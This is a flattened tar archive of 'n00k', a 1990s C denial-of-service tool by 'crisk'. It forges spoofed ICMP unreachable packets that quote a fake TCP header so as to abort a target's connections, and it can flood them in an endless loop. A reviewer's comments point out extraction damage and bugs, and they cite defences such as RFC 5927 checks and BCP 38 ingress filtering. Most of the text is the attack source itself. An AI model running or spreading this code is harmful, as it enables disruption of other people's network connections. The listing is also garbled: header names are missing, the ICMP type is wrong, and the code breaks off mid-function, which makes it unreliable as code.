/*
 * Reviewer note: this page appears to be a flattened tar archive holding
 * three C sources (resolve.c, gk.c, icmp_pkt.c). The
 * "NAME100644 ... 0ustar ..." runs are tar member headers, not C. The
 * extraction also seems to have dropped the header names after #include
 * and the placeholder words in the usage text, so the listing does not
 * compile as shown. Line breaks inside three string literals are wrap
 * artifacts and are kept where they were.
 *
 * The code forges an ICMP error that quotes a fabricated "original" IP
 * header plus 64 bits of TCP header. Receivers defend against this class
 * of message by checking the quoted TCP sequence number against data that
 * is actually in flight and by not aborting established connections on
 * ICMP hard errors (RFC 5927). Networks limit the forged source address
 * with ingress filtering (BCP 38).
 */
resolve.c100644 765 144 1605 6147444330 11441 0ustar krewlusers/*
 * resolve.c
 *
 * resolves an internet text address into (struct sockaddr_in).
 *
 * by crisk, 1995
 *
 * CHANGES: 1. added the RESOLVE_QUIET preprocessor conditions.
 *
 */

/* NOTE(review): the four header names below were lost in extraction. */
#include
#include
#include
#include

/*
 * resolve()
 * Looks up `name` with gethostbyname() and fills `*addr` with the address
 * family, the first returned address and `port` in network byte order.
 *
 * name : host name or address text to look up
 * addr : output structure; zeroed first, so it is all-zero on failure
 * port : port number in host byte order
 *
 * Returns 0 on success and -1 when the lookup fails.
 */
int resolve( const char *name, struct sockaddr_in *addr, int port )
{
  struct hostent *host;

  /* clear everything in case I forget something */
  bzero(addr,sizeof(struct sockaddr_in));

  if (( host = gethostbyname(name) ) == NULL ) {
#ifndef RESOLVE_QUIET
    fprintf(stderr,"unable to resolve host \"%s\" -- ",name);
    /* NOTE(review): gethostbyname() reports failures through h_errno, not
     * errno, so perror() may print an unrelated message here. */
    perror("");
#endif
    return -1;
  }

  addr->sin_family = host->h_addrtype;
  /* NOTE(review): h_length is copied unchecked into sin_addr; nothing here
   * verifies that it does not exceed sizeof(addr->sin_addr) or that
   * h_addrtype is AF_INET. */
  memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
  addr->sin_port = htons(port);

  return 0;
}

/*
 * addr_to_ulong()
 * Returns the s_addr field of `addr` unchanged (no byte-order conversion
 * is applied here).
 */
unsigned long addr_to_ulong(struct sockaddr_in *addr)
{
  return addr->sin_addr.s_addr;
}
gk.c100644 765 144 14246 6147444346 10417 0ustar krewlusers/*
 * n00k.c
 * by crisk
 *
 * try to icmp-nuke a host using spoofed icmp-unreachable packets.
 *
 * version 0.0.1beta January 1996
 *
 * Possible enhancements:
 * - Automatic/semi-automatic route tracing
 * - Source routing IP (in icmp_pkt.c)
 *
 */

/* #define ICMP_PKT_DEBUG */
/* Defined before resolve.c is included, so resolve()'s own stderr
 * diagnostic is compiled out. */
#define RESOLVE_QUIET

/* NOTE(review): the six header names below were lost in extraction. */
#include
#include
#include
#include
#include
#include
/* The two .c files are included textually, so everything on this page
 * builds as a single translation unit. */
#include "resolve.c"
#include "icmp_pkt.c"

#define N00K_VERSION "0.0.1beta"

/* GENERAL ROUTINES ------------------------------------------- */

/* banner(): prints the program name, N00K_VERSION and author to stdout. */
void banner(void)
{
  printf("\nn00k\n");
  printf("version %s\n",N00K_VERSION);
  printf("by crisk.\n\n");
}

/*
 * usage(): prints the command-line synopsis to stdout.
 * progname : program name shown in the synopsis line.
 * NOTE(review): the positional-argument names seem to have been stripped
 * from these strings by the extraction; they are left as found.
 */
void usage(const char *progname)
{
  printf("\nusage: \n");
  printf("%s [-f] [-q seq] [-p sport] [-d dport] \n\n",progname);
  printf("\t-f : flood\n");
  printf("\t-q : set the bogus-original tcp sequence# to \n");
  printf("\t-p : set the bogus-original tcp source port to \n");
  printf("\t-d : set the bogus-original tcp dest. 
port to \n");
  printf("\t : unreachable type (0 to 12)\n");
  printf("\t : address of fake ICMP packet sender\n");
  printf("\t : destination of the unreach message\n");
  printf("\t : the faked destination or the orig-tcp packet\n");
  printf("\n");
}

/* OPTION PARSING -------------------------------------------- */

/* File-scope state written by parse_args() and resolve_all() and read by
 * give_info() and main(). */
unsigned char *dest_name;          /* positional argument, set in parse_args() */
unsigned char *origdest_name;      /* positional argument, set in parse_args() */
unsigned char *spoof_name = NULL;  /* positional argument, set in parse_args() */
struct sockaddr_in destaddr;       /* filled at the end of resolve_all() */
unsigned long origdest_addr;       /* s_addr value stored by resolve_one() */
unsigned long dest_addr;           /* s_addr value stored by resolve_one() */
unsigned long spoof_addr;          /* s_addr value stored by resolve_one() */
unsigned char type;                /* unreachable code, checked to be <= 12 */
unsigned sport, dport;             /* -p and -d option values */
unsigned long seq;                 /* -q option value */
char flood = 0;                    /* set to 1 by -f */

/* Display strings indexed by `type`; 13 entries, matching the 0-12 range
 * enforced in parse_args(). */
char *unreachables[] = {"Network unreachable",
                        "Host unreachable",
                        "Protocol unreachable",
                        "Port unreachable",
                        "Fragmantation needed and DF set",
                        "Source route failed",
                        "Network unknown",
                        "Host unknown",
                        "Source host is isolated",
                        "Network administratively unreachable",
                        "Host administratively unreachable",
                        "Network unreachable - type of service",
                        "Host unreachable - type of service"};

/*
 * resolve_one()
 * Resolves `name` through resolve() and stores the resulting s_addr in
 * `*addr`.
 *
 * desc : label used in the error message.
 *
 * Returns 0 on success; prints an error and returns -1 when resolve()
 * fails, leaving `*addr` untouched.
 */
int resolve_one(const char *name, unsigned long *addr, const char *desc)
{
  struct sockaddr_in tempaddr;

  if (resolve(name, &tempaddr,0) == -1) {
    printf("error: can't resolve the %s.\n",desc);
    return -1;
  }

  *addr = tempaddr.sin_addr.s_addr;
  return 0;
}

/*
 * resolve_all()
 * Resolves the three names into the origdest_addr, dest_addr and
 * spoof_addr globals (spoof is skipped when NULL), then fills the global
 * destaddr from dest_addr.
 *
 * Returns -1 as soon as one lookup fails.
 * NOTE(review): the success path reaches the closing brace without a
 * return statement, so the value a caller would read is undefined.
 */
int resolve_all(const char *origdest, const char *dest, const char *spoof)
{
  if (resolve_one(origdest,&origdest_addr,"origdest address")) return -1;
  if (resolve_one(dest,&dest_addr,"dest address")) return -1;
  if (spoof!=NULL)
    if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1;

  destaddr.sin_addr.s_addr = dest_addr;
  destaddr.sin_family = AF_INET;
  destaddr.sin_port = 0;
}

/*
 * give_info()
 * Prints the parsed names, resolved addresses, port and sequence options
 * and the selected unreachable code to stdout.
 *
 * NOTE(review): inet_ntoa() is declared to take a struct in_addr, while
 * these arguments are the unsigned long globals declared above; confirm
 * how this was expected to build.
 */
void give_info(void)
{
  printf("# target address : %s (%s)\n",dest_name,inet_ntoa(dest_addr));
  printf("# original packet target : %s (%s)\n",origdest_name,inet_ntoa(origdest_addr));
  printf("# spoof-from address : %s (%s)\n\n",spoof_name,inet_ntoa(spoof_addr));
  printf("# bogus TCP source port : %u\n",sport);
  printf("# bogus TCP dest. port : %u\n",dport);
  printf("# bogus TCP sequence no. 
: %lu\n\n",seq);
  /* type was range-checked in parse_args(), so the index stays in bounds. */
  printf("# ICMP unreachable type : %u (%s)\n\n",type,unreachables[type]);
}

/*
 * parse_args()
 * Parses the -f, -q, -p and -d options with getopt(), then reads the
 * positional arguments into type, spoof_name, dest_name and origdest_name.
 *
 * Returns 0 on success and -1 on any parse error; main() prints the usage
 * text in that case.
 */
int parse_args(int argc, char *argv[])
{
  int opt;
  char *endptr;

  while ((opt=getopt(argc, argv, "fq:p:d:")) != -1) {
    switch(opt) {
      case 'f':
        flood = 1;
        break;
      /* NOTE(review): the three numeric options only reject trailing
       * characters; an empty string or an out-of-range value is accepted. */
      case 'q':
        seq = strtoul(optarg,&endptr,10);
        if (*endptr != '\0') {
          printf("%s: bad sequence number '%s'\n", argv[0], optarg);
          return -1;
        }
        break;
      case 'p':
        sport = strtoul(optarg,&endptr, 10);
        if (*endptr != '\0') {
          printf("%s: bad source port number '%s'\n",argv[0],optarg);
          return -1;
        }
        break;
      case 'd':
        dport = strtoul(optarg,&endptr, 10);
        if (*endptr != '\0') {
          printf("%s: bad dest port number '%s'\n",argv[0],optarg);
          return -1;
        }
        break;
      case '?':
      case ':':
        return -1;
        break;
    }
  }

  /* NOTE(review): this test passes with only two arguments left, but four
   * are consumed below, so a short command line reads argv[] at and beyond
   * argc. */
  if (optind > argc-2) {
    printf("%s: missing parameters\n",argv[0]);
    return -1;
  }

  /* NOTE(review): `type` is an unsigned char, so the strtoul() result is
   * narrowed before the range test; a large value can wrap into 0-12. */
  type = strtoul(argv[optind++],&endptr,10);
  if ((*endptr != '\0') || (type>12)) {
    /* NOTE(review): the format has a %s but no argument is passed, which
     * is undefined behaviour; the sibling messages pass argv[0]. */
    printf("%s: bad unreachable type (0-12 only)\n");
    return -1;
  }

  if ((type == 2) || (type == 3)) {
    printf("%s: (warning) unreaches of type 2 and 3 should be host-originated\n\n",argv[0]);
  }

  spoof_name = argv[optind++];
  dest_name = argv[optind++];
  origdest_name = argv[optind++];

  return 0;
}

/* MAIN ------------------------------------------------------ */

/*
 * main()
 * Prints the banner, parses the command line, resolves the three names,
 * prints the summary, opens a raw socket and calls icmp_unreach_send()
 * either once or, with -f, in an endless loop.
 *
 * NOTE(review): the results of resolve_all() and socket() are not
 * checked, so a failed lookup or a refused raw socket (these normally
 * need elevated privilege) is only noticed when the send fails. `void
 * main` is also non-standard.
 */
void main(int argc, char *argv[])
{
  int s;
  int floodloop;

  banner();

  if (parse_args(argc,argv)) {
    usage(argv[0]);
    return;
  }

  resolve_all(origdest_name, dest_name, spoof_name);
  give_info();

  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

  if (!flood) {
    if (icmp_unreach_send(s,&destaddr,type,spoof_addr,origdest_addr
                          ,dest_addr,sport,dport,seq) == -1) {
      printf("%s: error sending packet\n",argv[0]);
      perror("");
      return;
    }
  } else {
    printf("flooding. 
each dot represents 50 packets\n");
    floodloop = 0;
    /* Each pass sleeps 2500 microseconds and sends one packet with the
     * quoted sequence number advanced by one. For a monitor this shows up
     * as a steady stream of near-identical ICMP errors toward one host
     * whose quoted TCP sequence numbers increase by one per message. */
    while(1) {
      usleep(2500);
      if (icmp_unreach_send(s,&destaddr,type,spoof_addr,
                            origdest_addr,dest_addr,sport,dport,
                            seq++) == -1) {
        printf("%s: error sending packet\n",argv[0]);
        perror("");
        return;
      }
      /* floodloop counts modulo 50; a dot is printed each time it wraps. */
      if (!(floodloop = (floodloop+1)%50)) {
        fprintf(stdout,".");
        fflush(stdout);
      }
    }
  }
}
icmp_pkt.c100644 765 144 7520 6147444601 11573 0ustar krewlusers/*
 * icmp_pkt.c
 * by crisk
 *
 * routines to send a custom icmp/ip packet over the net.
 *
 * CHANGES: changed ttl value on both headers to be possible to such a packet.
 *
 */

#define IPHDRSIZE sizeof(struct iphdr)
#define ICMPHDRSIZE sizeof(struct icmphdr)

/* NOTE(review): the five header names below were lost in extraction. */
#include
#include
#include
#include
#include

/* File-scope int with no initializer, so it starts at zero; no assignment
 * to it is visible in this part of the page. */
int cize;

/* ********** RIPPED CODE START ******************************** */

/*
 * in_cksum --
 * Checksum routine for Internet Protocol family headers (C Version)
 *
 * addr : start of the data, read as 16-bit words
 * len  : number of bytes to sum
 *
 * Returns the one's-complement of the folded 16-bit sum.
 * Written as an old-style (K&R) definition, so calls are not checked
 * against a prototype.
 * NOTE(review): the accumulator is a signed int; presumably len is small
 * enough here that it cannot overflow. Confirm against the callers.
 */
unsigned short in_cksum(addr, len)
    u_short *addr;
    int len;
{
        register int nleft = len;
        register u_short *w = addr;
        register int sum = 0;
        u_short answer = 0;

        /*
         * Our algorithm is simple, using a 32 bit accumulator (sum), we add
         * sequential 16 bit words to it, and at the end, fold back all the
         * carry bits from the top 16 bits into the lower 16 bits.
         */
        while (nleft > 1) {
                sum += *w++;
                nleft -= 2;
        }

        /* mop up an odd byte, if necessary */
        if (nleft == 1) {
                /* The trailing byte is stored into the first byte of
                 * `answer`; the other byte stays zero. */
                *(u_char *)(&answer) = *(u_char *)w ;
                sum += answer;
        }

        /* add back carry outs from top 16 bits to low 16 bits */
        sum = (sum >> 16) + (sum & 0xffff);     /* add hi 16 to low 16 */
        sum += (sum >> 16);                     /* add carry */
        answer = ~sum;                          /* truncate to 16 bits */
        return(answer);
}

/* ********** RIPPED CODE END ******************************** */

/*
 * icmp_unreach_send()
 * builds and sends an ICMP unreachable packet. Since ICMP unreachable packets
 * contain the IP header + 64 bits of original datagram, we create a bogus
 * IP header and the first 64 bits of a TCP header (ports and syn). 
* */ inline int icmp_unreach_send(int socket, struct sockaddr_in *address, unsigned char icmp_code, unsigned long spoof_addr, unsigned long s_addr, unsigned long t_addr, unsigned s_port, unsigned t_port, unsigned long seq) { unsigned char packet[4098]; struct iphdr *ip; struct icmphdr *icmp; struct iphdr *origip; unsigned char *data; int i; ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet+IPHDRSIZE); origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE); data = (char *)(packet+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE); memset(packet, 0, 4098); ip->saddr = spoof_addr; ip->daddr = t_addr; ip->version = 4; ip->ihl = 5; ip->ttl = 255-random()%15; ip->protocol = IPPROTO_ICMP; ip->tot_len = htons(IPHDRSIZE + cize + ICMPHDRSIZE + IPHDRSIZE + 8); ip->check = in_cksum(packet,IPHDRSIZE); origip->saddr = t_addr; /* this is the 'original' header. */ origip->daddr = s_addr; origip->version = 4; origip->ihl = 5; origip->ttl = ip->ttl - random()%15; origip->protocol = IPPROTO_TCP; origip->tot_len = IPHDRSIZE + 30; origip->id = random()%69; origip->check = in_cksum(origip,IPHDRSIZE); *((unsigned int *)data) = htons(s_port); *((unsigned int *)(data+2)) = htons(t_port); *((unsigned long *)(data+4)) = htonl(seq); /* 'original IP header + 64 bits (of bogus TCP header)' made. */ icmp->type = ICMP_ECHO; /* should be 3 */ icmp->code = icmp_code; icmp->checksum = in_cksum(icmp,cize+ICMPHDRSIZE+IPHDRSIZE+8); /* the entire ICMP packet it now ready. */ #ifdef ICMP_PKT_DEBUG printf("Packet ready. Dump: \n"); for (i=0;i